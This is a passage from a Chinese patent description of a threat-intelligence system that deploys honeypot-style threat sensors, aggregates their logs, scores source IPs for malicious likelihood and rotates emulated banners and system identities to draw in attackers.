威胁传感器部署和管理的制作方法
威胁传感器部署和管理
背景技术:
1.物联网(“iot”)是一个短语,用于在现有互联网基础设施内连接分散在全球各地的计算装置。iot装置可嵌入在多种产品中,如家用电器、制造装置、打印机、汽车、恒温器、智能交通灯、摄像机等。
2.大多数iot装置的功能都不足以实现稳健的恶意软件感染检测。然而,即使对于能够实现恶意软件感染检测的iot装置,此类检测的可靠性也可能不如更强大的计算装置上更大的恶意软件感染检测服务的可靠性。例如,由服务提供商网络或服务器计算机实现的恶意软件感染检测服务可能使用数亿个参数,而在iot装置上运行的恶意软件感染检测可能只使用少数参数。此外,给定iot装置上恶意软件感染检测接收的数据量和类型可能会随着时间而变化。随着时间的推移,恶意软件感染检测可能会失去准确性,变得不那么有用。
3.为了获得更多的威胁情报,各组织实施了蜜罐(honeypots)来吸引恶意参与者。蜜罐是一种计算机安全机制,被设置用于检测、转移或以某种方式抵制未经授权使用信息系统的企图。通常,蜜罐由看似是站点合法部分的数据(例如,网络站点中的数据)组成,这些数据似乎含有信息或对攻击者有价值的资源,但实际上是被隔离和监测的,能够阻止或分析攻击者。各组织实施了不同类型的蜜罐。纯蜜罐是成熟的生产系统,攻击者的活动通过在蜜罐与网络的链接上安装的窃听器(bug tap)进行监测。高交互蜜罐模拟承载各种服务的生产系统的活动,因此,攻击者可能会被允许使用大量服务来浪费他们的时间。高交互蜜罐由于难以检测而提供了更高的安全性,但维护很昂贵。低交互蜜罐仅模拟攻击者频繁请求的服务。因为它们消耗的资源相对较少,所以复杂性有所降低。
附图说明
4.图1示出根据一些实施例的提供商网络中的威胁情报系统的实例系统环境,所述威胁情报系统包括威胁传感器部署和管理服务、分布式威胁传感器数据聚合和数据导出服务及分布式威胁传感器分析和相关服务,在多个地理区域中部署多个威胁传感器且与客户端网络中的多个威胁传感器通信,其中威胁传感器中的一个或多个通过互联网与计算参与者交互。
5.图2示出根据一些实施例的威胁传感器部署和管理组件的实例系统的其它方面,其中威胁传感器部署和管理服务部署并配置多个威胁传感器,威胁传感器含有多个不同威胁数据收集器,其中威胁数据收集器从多个潜在恶意参与者接收入站通信。
6.图3示出根据一些实施例的分布式威胁传感器数据聚合和数据导出组件的实例系统的其它方面,其从数据流服务接收传感器日志流,所述数据流服务从多个威胁传感器接收数据,其中分布式威胁传感器数据聚合和数据导出组件将传感器日志聚合到表格中,然后计算与威胁传感器交互的各个来源的显著性得分。
7.图4示出根据一些实施例的分布式威胁传感器分析和相关组件的实例系统的其它方面,其接收与交互来源相关联的显著性得分,确定恶意参与者,然后使恶意参与者与网络中的已知装置相关以确定受感染的已知装置,接着关于受感染的已知装置的某种通知。
8.图5示出根据一些实施例的威胁情报系统的一部分的实例系统环境,其中多个威胁传感器将传感器日志提供到传感器日志获取/分析服务,所述传感器日志获取/分析服务将威胁情报表格提供到威胁情报导出服务,所述威胁情报导出服务将数据提供到威胁情报相关服务,其中实例系统包含多个其它组件和服务。
9.图6示出根据一些实施例的威胁情报系统的实例提供商网络环境,其中威胁情报系统由事件驱动计算服务、对象存储服务、数据库服务和数据流服务的部分实施,并且其中已部署威胁传感器和潜在恶意参与者由提供商网络的计算实例服务实施。
10.图7是根据一些实施例的可由威胁传感器部署和管理组件实施的说明性方法的流程图,其中威胁传感器部署和管理组件确定部署计划,部署多个威胁传感器,从已部署威胁传感器收集威胁数据,确定调整后的部署计划,并执行部署计划的调整。
11.图8是根据一些实施例的可由威胁传感器和所述威胁传感器的选定威胁数据收集器实施的说明性方法的流程图。
12.图9是根据一些实施例的可由分布式威胁传感器数据聚合和数据导出组件实施的说明性方法的流程图,其中分布式威胁传感器数据聚合和数据导出组件接收具有关于与威胁传感器之间的交互的信息的传感器日志流,按照交互来源聚合传感器日志中的信息,计算来源的显著性得分,并将显著性得分提供到其它目标,其中显著性得分包含来源参与威胁网络通信的可能性。
13.图10是根据一些实施例的可由分布式威胁传感器数据聚合和数据导出组件实施的说明性方法的更详细流程图,其中分布式威胁传感器数据聚合和数据导出组件接收具有关于与威胁传感器之间的交互的信息的传感器日志流,可访问其它信息以修改传感器日志,按照交互来源聚合传感器日志中的信息,访问历史数据,计算来源的显著性得分,并将显著性得分和/或传感器日志导出到一个或多个目标,其中显著性得分包含来源参与威胁网络通信的可能性。
14.图11是根据一些实施例的可由分布式威胁传感器数据聚合和数据导出组件或分布式威胁传感器分析和相关组件实施以计算与一个或多个威胁传感器交互的来源的显著性得分的说明性方法的流程图。
15.图12是根据一些实施例的可由分布式威胁传感器分析和相关组件实施的说明性方法的流程图,其中分布式威胁传感器分析和相关组件获得与威胁传感器交互的不同来源的显著性得分,基于显著性得分确定哪些来源是恶意参与者,接收已知参与者的标识符,例如提供商网络中的服务器、提供商网络中的计算实例、客户端网络中的客户端装置或远程网络中部署的iot装置,并使恶意参与者与已知参与者相关,以识别哪些已知参与者可能受到恶意软件感染。
16.图13是根据一些实施例的含有多个不同威胁数据收集器的威胁传感器的逻辑图,其中威胁数据收集器从潜在恶意参与者接收入站通信,其中低交互威胁数据收集器设计成捕获通过tcp和udp以及icmp消息的服务端口上的交互,中等交互威胁数据收集器用于telnet、ssh和ssdp/upnp。
17.图14是根据一些实施例的逻辑图,示出了在数据存储区中检索和存储恶意软件样本以关于威胁传感器和/或威胁数据收集器与外部恶意软件分布点的交互进行进一步静态和动态分析,其中检索到的文件以递归方式获取和分析以供进一步的出站引用。
18.图15是根据一些实施例的例如iot装置的边缘装置的框图,其可以是与潜在恶意装置匹配的一个已知装置。
19.图16是根据一些实施例的框图,示出了可用于威胁情报服务和/或威胁传感器部署和管理组件和/或分布式威胁传感器数据聚合和数据导出组件和/或分布式威胁传感器分析和相关组件的实例计算机系统。
20.尽管本文通过实例的方式针对若干实施例和说明性图式描述了实施例,但是所属领域技术人员将认识到,实施例不限于所描述的实施例或图式。应当理解,附图及其详细描述并不旨在将实施例限于所公开的特定形式,而是相反,本发明旨在覆盖落入由所附权利要求书限定的精神和范围内的所有修改、等同物和替代方案。本文中所使用的标题仅用于组织目的,并且不意图用于限制描述或权利要求书的范围。如贯穿本技术所使用,词语“可”以准许的意义(即,意指有可能)而非强制意义(即,意指必须)来使用。类似地,词语“包含(include、including和includes)”意味着包含但不限于。
21.另外,在以下各节中,现在将详细参考实施例,其实例在附图中示出。在以下详细描述中,列出了许多具体细节,以提供对本公开的透彻理解。然而,对于本领域的普通技术人员来说,显而易见的是,可以在没有这些具体细节的情况下实施一些实施例。在其它情况下,尚未详细描述众所周知的方法、程序、组件、电路和网络,以免不必要地模糊实施例的各个方面。
22.本说明书包含对“一个实施例”或“实施例”的引用。短语“在一个实施例中”或“在实施例中”的出现不一定指同一实施例。特定特征、结构或特性可以按照本公开的任何适当方式组合。
[0023]“包括”。这一术语是开放式的。如所附权利要求书中所使用的,此术语不排除额外结构或步骤。设想一条表述如下的权利要求:“一种设备,其包括一个或多个处理器单元
……”
。这样的权利要求并不排除所述设备包含额外组件(例如,网络接口单元、图形电路系统等)。
[0024]“配置成”。各种单元、电路或其它组件可能被描述为或声称为“配置成”执行一项或多项任务。在此类背景中,“配置成”用于通过指示单元/电路/组件包含在操作期间执行这些任务的结构(例如电路系统)来暗示结构。因此,可以说,即使指定的单元/电路/组件当前不工作(例如,未打开),所述单元/电路/组件也可以配置成执行任务。与“配置成”语言一起使用的单元/电路/组件包含硬件——例如,电路、存储可执行以实施操作的程序指令的存储器等。明确指出单元/电路/组件“配置成”执行一个或多个任务,并不旨在为所述单元/电路/组件调用35 u.s.c.
§
112第六段。另外,“配置成”可包含由软件和/或固件(例如,fpga或执行软件的通用处理器)操纵的通用结构(例如,通用电路系统)以能够执行相关任务的方式操作。“配置成”还可包含调整制造过程(例如,半导体制造设施)以制造适合实施或执行一个或多个任务的装置(例如,集成电路)。
[0025]“基于”。如本文中所使用,此术语用于描述影响确定的一个或多个因素。这一术语并不排除可能影响确定的额外因素。也就是说,确定可以完全基于这些因素,或者至少部分地基于这些因素。设想短语“基于b确定a”。在这种情况下,b是影响a的确定的因素,这样的短语并不排除a的确定还基于c。在其它情况下,a可以仅基于b确定。
[0026]
还将理解,尽管本文中可以使用术语第一、第二等来描述各个元件,但这些元件不
应受到这些术语的限制。这些术语仅用于区分一个元件和另一个元件。例如,第一触点可以称为第二触点,同样,第二触点可以称为第一触点,而不会偏离预期的范围。第一触点和第二触点都是触点,但它们不是同一个触点。如本文中所使用,这些术语用作它们后面的名词的标签,并不意味着任何类型的排序(例如,空间、时间、逻辑等)。例如,缓冲器电路本文中可以描述为对“第一”和“第二”值执行写入操作。术语“第一”和“第二”并不一定意味着第一值必须在第二值之前写入。
[0027]
本文描述中使用的术语仅用于描述特定实施例,并不旨在进行限制。如说明书和所附权利要求书中所使用,单数形式“一(a/an)”和“所述(the)”意在同样包含复数形式,除非上下文另有明确指示。还应理解,本文使用的术语“和/或”是指并包含一个或多个相关联的列出项目的任何和所有可能组合。应进一步理解,当在本说明书中使用术语“包含(includes/including)”、“包括(comprises/comprising)”时,规定了所述特征、整数、步骤、操作、元件和/或组件的存在,但不排除一个或多个其它特征、整数、步骤、操作、元件、组件和/或其群组的存在或添加。
[0028]
如本文中所使用,根据上下文,术语“如果”可解释为是指“当
……
时”或“在
……
后”或“响应于确定”或“响应于检测到”。类似地,根据上下文,短语“如果确定”或“如果检测到[所述条件或事件]”可解释为是指“在确定后即刻”或“响应于确定”或“在检测到[所述条件或事件]后即刻”或“响应于检测到[所述条件或事件]”。
具体实施方式
[0029]
本文描述的系统和方法实施了恶意软件威胁情报系统,在一些实施例中,此系统可用于检测各种类型环境中的威胁。在一些实施例中,恶意软件威胁情报系统设计成收集、整理和发布针对提供商网络或客户端网络或iot装置或网络的恶意软件和/或僵尸网络的技术指标。因此,本文所公开的恶意软件威胁情报系统不受边缘装置或iot装置的限制,而是可以更广泛地使用。在一些实施例中,此系统包括多个威胁传感器,它们部署在不同的网络地址且物理地位于提供商网络中的不同地理区域,用于检测来自来源的交互。在一些实施例中,恶意软件威胁情报系统可包括三个独立的组件:威胁传感器部署和管理组件、分布式威胁传感器数据聚合和数据导出组件以及分布式威胁传感器分析和相关服务。并非所有这三个组件都必须存在。一个系统可能只含有其中一个或两个组件。除这些组件之外,系统还可含有其它组件。系统可含有包含此处列出的多个组件在不同组件配置中的功能的组件。例如,系统可能会将其中两个组件的某些功能合并到一个组件中。在各种不同的实施例中,有许多不同类型的恶意软件威胁情报系统,此处列出的特定组件详细信息不应视为具有限制性。
[0030]
在一些实施例中,恶意软件威胁情报系统可包括威胁传感器部署和管理组件。例如,威胁传感器部署和管理组件可实施为提供商网络的恶意软件威胁情报系统的服务。在一些实施例中,威胁传感器部署和管理组件可确定所述多个威胁传感器的部署计划,包含威胁传感器相关联的威胁数据收集器的部署计划。可存在不同类型的威胁数据收集器。不同的威胁传感器可包括不同数目和类型的威胁数据收集器。威胁数据收集器可使用不同的通信协议或端口,或者提供针对入站通信的不同类型的响应。不同的威胁传感器还可具有不同的寿命。在一些实施例中,威胁传感器部署和管理组件可基于部署计划部署威胁传感
器,从已部署威胁传感器收集数据,基于收集到的数据和威胁传感器寿命调整部署计划,并执行调整。
[0031]
在一些实施例中,恶意软件威胁情报系统可包括分布式威胁传感器数据聚合和数据导出组件。例如,分布式威胁传感器数据聚合和数据导出组件可实施为提供商网络的恶意软件威胁情报系统的服务。在一些实施例中,分布式威胁传感器数据收集和数据导出组件从所述多个威胁传感器接收传感器日志流。在一些实施例中,传感器日志流可具有关于与威胁传感器之间的交互的信息,包含交互来源的标识符。在一些实施例中,分布式威胁传感器数据聚合和数据导出组件可根据来源聚合传感器日志中的信息,并计算来源的显著性得分。例如,显著性得分量化了来源参与威胁网络通信的可能性。在一些实施例中,分布式威胁传感器数据聚合和数据导出组件可将显著性得分提供到其它目标。
[0032]
在一些实施例中,恶意软件威胁情报系统可包括分布式威胁传感器分析和相关组件。例如,分布式威胁传感器分析和相关组件可实施为提供商网络的恶意软件威胁情报系统的服务。在一些实施例中,分布式威胁传感器分析和相关组件获得与所述多个威胁传感器交互的不同来源的显著性得分。在一些实施例中,分布式威胁传感器分析和相关组件可基于显著性得分而确定哪些来源是恶意参与者。在一些实施例中,组件可接收已知参与者的标识符,例如提供商网络中的服务器、提供商网络中的计算实例、客户端网络中的客户端装置或远程网络中部署的iot装置。在这些实施例中的一些实施例中,分布式威胁传感器分析和相关组件可使恶意参与者与已知参与者相关,以识别哪些已知参与者可能受到恶意软件感染。
[0033]
iot装置
[0034]
在一些实施例中,物联网(“iot”)是一个由相互关联的计算装置、机械和数字机器、物体、动物或人组成的系统,具有唯一标识符(uid),并且能够在网络上传递数据,而无需人与人或人与计算机交互。在消费市场实施例中,iot技术和与“智能家居”概念相关的产品最为同义,涵盖支持一个或多个共同生态系统的装置和电器(如照明器具、恒温器、家庭安全系统和摄像头,以及其它家用电器),并且可以经由与所述生态系统相关联的装置进行控制,比如智能手机和智能扬声器。在商业环境实施例中,iot技术可应用于医疗保健行业、运输、车辆通信系统、建筑和家庭自动化等领域。例如,医疗物联网(“iomt”)可以应用于医疗和健康相关目的、数据收集和分析研究以及监测。iomt可以创建一个数字化医疗系统,连接可用的医疗资源和医疗服务。例如,在运输方面,iot可以帮助整合各种运输系统之间的通信、控制和信息处理。作为另一实例,在车辆通信系统中,车辆对车辆通信(v2v)、车辆对基础设施通信(v2i)、车辆对行人通信(v2p)和车辆对万物通信(v2x)是iot技术,是实现自主驾驶和互联道路基础设施的第一步。作为另一实例,在建筑和家庭自动化中,iot装置可用于监测和控制家庭自动化和建筑自动化系统中各种类型建筑(例如,公共和私人、工业、机构或住宅)中使用的机械、电气和电子系统。例如,在工业环境中,工业iot装置可以从连接的装备、操作技术(“ot”)、地点和人员中获取和分析数据。工业iot与操作技术监测装置相结合,有助于监管和监测工业系统。在基础设施实施例中,监测和控制可持续城市和农村基础设施的运行,例如桥梁、铁路轨道以及陆上和海上风电场,是iot的关键应用。在军事环境中,军事物联网(“iomt”)是iot技术在军事领域的应用,用于侦察、监视和其它作战相关目标。以上只是各种类型iot装置的一些实例,并不是所有iot装置的详尽列表,因此并不意
在进行限制。
[0035]
对于许多不同的iot应用,许多iot部署都由数十万到数百万台装置组成,因此跟踪、监测和管理连接的装置组至关重要。连接的装置使用不同类型的无线通信协议不断地相互通信以及与管理网络通信。在通信创建响应性iot应用程序的同时,它还可能暴露iot安全漏洞,并为恶意参与者或意外数据泄漏打开渠道。为了保护用户、装置和公司,iot装置必须得到保护。iot安全的基础存在于装置之间连接的控制、管理和设置中。适当的保护有助于保持数据私有化,限制对装置和云资源的访问,提供安全的连接云的方法,并审核装置使用情况。iot安全策略通过使用装置身份管理、加密和访问控制等策略来减少漏洞。因此,部署iot装置的任何组织都需要确保iot装置在部署后能够正常、安全地工作。此类组织可能还需要确保iot装置的访问安全,监测健康状况,检测并远程排除故障问题,以及管理软件和固件更新。
[0036]
iot装置管理和安全
[0037]
在一些实施例中,为了解决这些和其它问题,提供商网络可以提供iot装置管理。提供商网络的iot装置管理可使大规模安全注册、组织、监测和远程管理iot装置变得容易。提供商网络的iot装置管理允许部署iot装置的组织单独或批量注册连接的装置,并管理权限,以确保装置的安全。使用提供商网络,部署iot装置的组织还可以组织其装置,监测和排除装置功能故障,查询其装置组中任何iot装置的状态,并通过空中传送(“ota”)发送固件更新。提供商网络的iot装置管理可能与装置类型和os无关,因此组织可以全都使用相同的服务管理其部署的iot装置,如受限微控制器或联网汽车。提供商网络的iot装置管理允许部署iot装置的组织扩展其装置组,并减少管理大型和多样化iot装置部署的成本和工作量。
[0038]
在一些实施例中,作为iot装置管理服务的一部分,提供商网络可以提供一种服务,帮助部署iot装置的组织保护其iot装置组的安全。例如,安全漏洞可能是一个弱点,可被用来危害iot应用程序的完整性或可用性。iot装置本质上是易受攻击的。iot组由具有不同功能、寿命长且地理位置分散的装置组成。这些特性,结合装置数目的不断增加,提出了如何解决iot装置带来的安全风险的问题。即使一个组织已经实施了安全最佳实践,但新的攻击载体也在不断出现。为了检测和减少漏洞,组织需要持续审核装置设置和健康状况。
[0039]
进一步加剧安全风险的是,许多装置的计算、内存和存储能力都很低,这限制了在装置上实现安全性的机会。iot装置缺乏与诸如服务器、虚拟实例和桌上型电脑之类的其它类型的装置相同的可见性。对于大多数其它类型的装置,从这些装置收集的数据非常丰富。这一丰富的数据水平使得在确定感染和推断感染类型时具有较高的置信度和精确度。对这些其它装置的恶意软件检测可以使用这一丰富数据,例如网络流量中的特定模式或内存中的特定字节,来确定特定类型的病毒。然而,对于iot装置,由于iot装置周围的所有限制,许多这些类型的信号或指标都不可用或不可能收集。例如,一些iot装置根本无法监测内存,或者无法按照需要的频率监测内存。作为另一实例,一些iot装置不具备计算能力或联网能力来监测网络活动以进行深度包检查。
[0040]
恶意软件感染检测方法
[0041]
在一些实施例中,为了检测受感染的装置,存在至少两种通用检测方法:威胁情报和行为模式。在一些实施例中,威胁情报使用特定恶意软件的已知指标,如丢弃的文件散列
或特定内容签名,以及与僵尸网络的命令和控制服务器(“c&c”)的连接,来识别装置受到此恶意软件感染。这些指标通常可从积极跟踪恶意软件和僵尸网络并以威胁情报源(threat intelligence feeds)的形式发布其指标的威胁情报来源获得。在一些实施例中,行为模式使用观察到的符合装置感染各个阶段的行为模式来识别装置被感染,所述阶段例如侦察、渗透、持续存在和滥用。
[0042]
使用威胁情报,威胁情报源的质量可能会因其收集策略(即使用蜜罐、恶意软件引爆、手动反向工程)及其实施细节(即,从丢弃的恶意软件或与蜜罐的交互中提取与僵尸网络相关的网络位置的算法)等因素而异。不依赖这些质量因素而盲目信任威胁情报源的质量,可能会降低使用威胁情报进行装置感染检测的质量。必须考虑威胁情报源的类型,以便有效地用于识别受感染的装置。例如,在使用恶意ip地址源时,应将来自恶意ip地址的入站连接与到恶意ip地址上的出站连接区分开来。从恶意ip地址到装置的入站连接可指示以下任一连接:a)僵尸网络控制器到装置上安装的后门的连接;b)来自其它受感染装置的连接,用于下载装置上托管的恶意有效负载;或c)试图感染装置的连接(即,大规模随机互联网范围扫描)。因此,对于入站连接的所有这些可能性,如果不查看其它证据,就无法确定装置已被感染。相比之下,从装置到恶意ip地址的出站连接可以不那么模糊地归因于到僵尸网络c&c或有效负载分发主机的连接。威胁情报源的完整性和及时性因来源而异。例如,单个威胁情报来源可能无法跟踪特定类型的僵尸网络(即,由于缺少吸引和接触僵尸网络所需的基础设施),或者可能会延迟发布指标(即,因为发布前审查源的手动过程缓慢)。因此,应根据威胁情报来源跟踪iot特定恶意软件和僵尸网络的能力来选择威胁情报来源。另外,还应考虑到无法从威胁情报来源接收所有相关iot恶意软件和僵尸网络的指标和/或发布的指标质量参差不齐的可能性。
[0043]
使用行为模式,受感染装置常见的个别行为模式可能与合法装置行为有很大的相似性。例如,设想这样一个场景:一个受感染的装置被滥用以发起诸如tcp syn洪水之类的大规模拒绝服务攻击。孤立地查看tcp流量峰值,并且独立于网络流量的形状、网络包的内容、网络流量的目标等因素,或者考虑装置的历史流量模式,装置合法的感测数据上传到其云存储可能会产生类似的网络流量峰值。因此,我们可能经常需要增加行为信号/指标的类型及其关联信息,以消除合法和非法装置行为的歧义。由于缺乏更多行为信号/指标的可见性(即,不可能在装置上执行深层网络包检查)或由于信号质量差(即,装置上的开放连接方向未知),我们可能不得不依赖启发式(即,基于装置的本地和远程端口号,或者基于装置上已知的开放端口,结合本地和远程开放连接端口,猜测装置上开放连接的方向)来解决从装置收集的行为信号/指标的数量和质量方面的缺陷。受感染的装置通常会在超过一个时间窗口内呈现受感染装置常见的超过一个行为模式。相比之下,装置的合法行为模式与受感染装置常见的多个行为模式重叠的可能性较小。例如,典型的受感染装置可能在同一时间窗口或跨多个相邻时间窗口显示以下所有行为模式:与c&c服务器的常规连接,使用随机生成或选择的ip地址探测其它装置以进行恶意软件传播,打开异常端口,通过异常协议/端口通信,以及对受害者目标执行tcp syn洪水拒绝服务攻击。
[0044]
检测恶意活动
[0045]
检测装置上呈渗透或任何安全损害的形式的恶意活动有两种或三种高级方法。第一种方法是收集和观察这些恶意活动的特征(signature)。例如,恶意活动的特征可以是知
道正在为特定恶意活动打开哪个端口,为所述恶意活动下载哪个文件,以及受感染装置试图为所述活动连接到哪个ip地址。通过恶意活动的特征,当观察到这些活动时,就知道已经发生或正在发生恶意活动,以及它是什么特定的恶意活动。特征可以识别恶意活动。第二种方法是已知的行为模式。例如,对于受感染装置上的恶意加密货币挖掘,恶意活动将安装软件,从而显著增加装置的cpu和内存使用量。可以定义和检测活动模式,以确定装置是否被恶意软件感染。第三种方法是异常检测,例如行为异常检测,用于检测装置是否受到恶意软件的感染,或者通常是未经授权访问的受害者。
[0046]
对于用于检测装置上的恶意活动的基于特征的方法,特征必须来自某处。必须从某处收集特定恶意软件的特征,例如针对特定攻击上传到装置的恶意文件的散列代码。收集的这些信息是前面详细介绍的威胁情报。
[0047]
收集威胁情报有不同的方法。一种方法是从蜜罐手机。蜜罐是假冒系统,假装真实以吸引恶意软件分发背后的参与者。在他们被吸引后,恶意参与者会越来越多地参与进来,揭露他们的活动以及他们想用这个装置做什么。当蜜罐收集数据时,蜜罐后面会有一个引擎分析活动以确定特征。例如,蜜罐可能会接收到具有特定有效负载的http get请求。然后,后端必须获取有效负载的位和片段并将它们放在一起。例如,后端系统可能会分析来源ip地址、反向域名查找或地理位置或恶意活动的来源网络或有效负载本身的内容,以确定特征。有效负载的内容可能指向另一位置,在那里将下载有关安全漏洞的其它材料。蜜罐背后的引擎必须从有效负载中提取此类信息。
[0048]
威胁情报系统
[0049]
在一些实施例中,本文公开的威胁情报系统设计成收集、整理和发布针对提供商网络或客户端网络或iot装置或网络的恶意软件和僵尸网络的技术指标。在这些实施例中的一些实施例中,威胁情报系统努力发布高保真指标,以降低客户误报的可能性。然而,必须强调的是,威胁情报和公布的威胁指标只有在与其它安全数据来源和分析方法结合使用时才能提供最佳结果。必须基于威胁指标的类型(即,ip地址、域名、url、进程和文件名、用户代理)、上下文(即,网络协议、目标服务、观察和活动时间表)以及收集和管理方法(即,蜜罐交互级别、保真度评分公式、数据保持和加权策略)使用威胁指标。误用具有错误假设和不切实际期望的威胁指标并且忽视其类型、上下文以及收集和管理方法,将导致误报。
[0050]
威胁情报系统的重点主要是收集威胁情报,例如与提供商网络或客户端网络或iot装置或网络相关的威胁情报。然而,威胁情报系统的传感器通常也会从通用恶意软件和僵尸网络中提取威胁指标。这些威胁指标仍在发布,因为它们有助于跟踪针对iot和通用计算装置两者的多用途恶意软件。事实上,威胁情报系统中有多种选择,可以配置传感器来吸引针对某个平台的恶意软件。
[0051]
当部署和运行多个威胁传感器时,可能存在规模问题。必须以保护自身完整性和收集尽可能多的信息的方式管理威胁传感器和相关联的威胁数据收集器。但是,如果只有一种类型的威胁数据收集器分配给单个威胁传感器,那么威胁传感器将仅收集针对特定类型目标的所述特定类型的情报。例如,一个非常简单的威胁数据收集器可以在单个服务器或单个威胁传感器上实施,并且可以模拟广泛使用的协议。例如,简单的威胁数据收集器可能会模拟某种形式的http服务器,例如tomcat服务器。因此,此威胁传感器将仅收集与其运行的http服务器的特定版本相关的信息,并且只会吸引针对所述版本的http服务器的潜在
恶意参与者。然而,一个有效的威胁情报系统应该尽可能多地压缩(capsulize)来自所分配的每个服务器或威胁传感器的内容。
[0052]
在一些实施例中,本文公开的恶意软件威胁情报系统可以设置威胁传感器和相关联的威胁数据收集器,从与威胁数据收集器的交互中收集信息,并将信息整理成安全系统可用于检测装置是否受感染的格式。例如,这些整理后的信息可以是签名的形式。在一些实施例中,本文公开的恶意软件威胁情报系统提供了实施、设计和管理威胁传感器和相关联的威胁数据收集器的集合的独特方法。在一些实施例中,蜜罐是一种威胁数据收集器的实例。
[0053]
威胁情报系统的威胁传感器未公开发布,因此在一些实施例中,与它们的任何交互都是可疑的。在一些实施例中,每个威胁传感器都被设计为捕获通过tcp和udp以及icmp消息的所有服务端口上的任何交互。在一些实施例中,在tcp交互的情况下,传感器完成握手,然后可以在关闭连接之前捕获多达10kb的网络有效负载。在一些实施例中,在通过tcp的tls交互中,传感器可配置成完成tls握手,以便以明文形式访问可疑有效负载。在一些实施例中,对于udp和icmp交互,威胁情报系统的威胁传感器可以捕获所接收消息上高达10kb的网络有效负载。在一些实施例中,这些有效负载可具有威胁情报价值,因为它们通常还包含其它威胁指标,例如恶意软件分发点的链接以及关于威胁参与者和攻击载体的信息。
[0054]
在一些实施例中,除了这些低交互威胁数据收集器外,威胁情报系统的威胁传感器还可以配备用于telnet、ssh、ssdp/upnp、hadoop、redis、docker、android debug bridge、hisilicon dvr、kguard dvr、mqtt和http代理的中等交互威胁数据收集器。在一些实施例中,这些威胁数据收集器模拟其对应真实服务的功能,引导可疑对象的交互,以显示更多信息,例如恶意软件样本以及报告和命令和控制服务器的网络位置。在这些实施例中的一些实施例中,例如使用假外壳(fake shells)的模拟方法确保传感器自身的完整性得到保护,并且可疑对象不能篡改其操作。
[0055]
在一些实施例中,威胁传感器收集的可疑对象交互数据通过处理管线移动,以增加、聚合、整理和产生可操作的威胁情报输出,作为制定安全决策的因素子集使用。在一些实施例中,ip地址等许多威胁指标可能太不稳定,无法独立于其它形式的安全分析进行安全警报。因此,在一些实施例中,威胁情报系统可以定期导出ip声誉数据,作为其威胁指标输出之一。
[0056]
在一些实施例中,ip声誉数据可包含每个ip地址的计算得分,用于指示其保真度,以便减少由于动态ip地址重新指派或可疑对象从大型网络代理背后操作而导致的误报。在一些实施例中,为了计算每个ip地址的保真度得分,威胁情报系统可以使用诸如历史时间跟踪和可疑对象活动的新鲜度、可疑对象与之交互的传感器数目和网络协议类型以及观察到的与可疑对象网络的连接方向等因素。例如,在一些实施例中,如果某一ip地址在过去3天内被频繁观察到,与多个威胁传感器交互,完成tcp握手(因此没有来源ip伪造),以及被引用为主动分发恶意软件二进制文件的回调网络点,那么它可以获得高保真度得分。在一些实施例中,每个可疑ip地址的保真度是针对某个时间点计算的,并且它基于其最新的活动模式和时间衰减因子进行演变。
[0057]
在一些实施例中,除ip声誉数据外,威胁情报系统还可以在数据存储区中维护可疑对象与系统威胁数据收集器交互产生的元数据和有效负载,并可通过数据库访问以进行
手动和自动威胁知识提取,例如威胁趋势分析和扩展威胁指标识别。在一些实施例中,对于可疑对象与外部恶意软件分发点的交互,威胁情报系统可以检索恶意软件样本并将其存储在数据存储区中,以进行进一步的静态和动态分析。
[0058]
威胁传感器和威胁数据收集器
[0059]
在一些实施例中,本文公开的恶意软件威胁情报系统可在给定威胁传感器内部署多个威胁数据收集器。在一些实施例中,给定威胁传感器内多个威胁数据收集器的这一部署可通过威胁传感器部署和管理服务或组件执行。在一些实施例中,蜜罐是一种威胁数据收集器的实例。在一些实施例中,恶意软件威胁情报系统或威胁传感器部署和管理组件可在一个威胁传感器内设置数个中等交互威胁数据收集器和数个低交互威胁数据收集器。例如,威胁传感器部署和管理组件可在单个威胁传感器中包含17或18个中等交互威胁数据收集器和3个低交互威胁数据收集器。
[0060]
威胁数据收集器的交互水平是指威胁数据收集器和与之交互的参与者进行接触的程度。例如,如果从位于来源的参与者接收到tcp包,那么威胁数据收集器仅发送回tcp包,或者“升级”到应用程序级协议并发送例如http协议包。作为另一实例,如果在telnet端口接收到tcp包,那么威胁数据收集器发起telnet会话,或者仅在捕获tcp请求的有效负载后发送回关闭会话的tcp包。在这个实例中,中等交互威胁数据收集器将发起telnet会话,而低交互威胁数据收集器将只是在捕获tcp请求的有效负载后发送回关闭会话的tcp包。
[0061]
威胁传感器上可以设置多种威胁数据收集器。为了简单起见,论述的第一实例将假设只存在一个威胁传感器,然后说明书将在稍后讨论将威胁传感器扩展为多个或一组威胁传感器。当部署和/或配置威胁传感器时,它会在指定时间量内接收与其相关联的“个性”。在一些实施例中,威胁传感器将部署和/或配置有特定数目的威胁数据收集器,每个威胁数据收集器将具有特定类型的特性。在这些实施例中的一些实施例中,每个威胁数据收集器将不同于威胁传感器中的任何其它威胁数据收集器。
[0062]
在一些实施例中,在威胁传感器的一个或多个威胁数据收集器更改为不同特性之前,威胁传感器的威胁数据收集器将仅在特定时间量内具有特定特性。在一个实施例中,特定时间量可以是10分钟。例如,一个特定特性可能是响应横幅,如http响应横幅。在一些实施例中,返回到http请求的响应可以从横幅池中获取。经过特定时间量后,威胁数据收集器可能会旋转为响应请求而呈现的横幅。例如,10分钟后,威胁数据收集器可能开始提供新的http响应横幅以响应http请求。特定时间量可以是定义的或预定义的时间量,也可以是随机的、未知的或可变的时间量,取决于实施例。作为另一实例,对于telnet会话,威胁数据收集器可能会在特定时间量后旋转为telnet会话呈现的横幅。
[0063]
另外,与横幅一样,其它特定特性可能会在特定时间量后更改或旋转。在一些实施例中,响应命令而呈现的信息可能会在特定时间量后更改。例如,在响应命令时,可能会向参与者呈现不同类型的平台。更具体地说,威胁数据收集器可能会在特定时间量内响应telnet会话中的“uname”命令,提供有关特定类型的unix系统的信息,但随后,威胁数据收集器可能会在接下来的特定时间量内提供有关windows系统或不同类型的unix系统的信息,以响应同一命令。因此,在一些实施例中,威胁数据收集器可以假装是不同类型的系统,从而增加从仅针对特定类型系统的参与者收集更多数据的可能性。威胁数据收集器在特定时间量后可能更改的其它特定特性是响应list files命令而列出的文件。本质上,威胁数
据收集器可以在特定时间量后更改其显示的特性,以吸引更多和/或针对不同类型系统的不同参与者。
[0064]
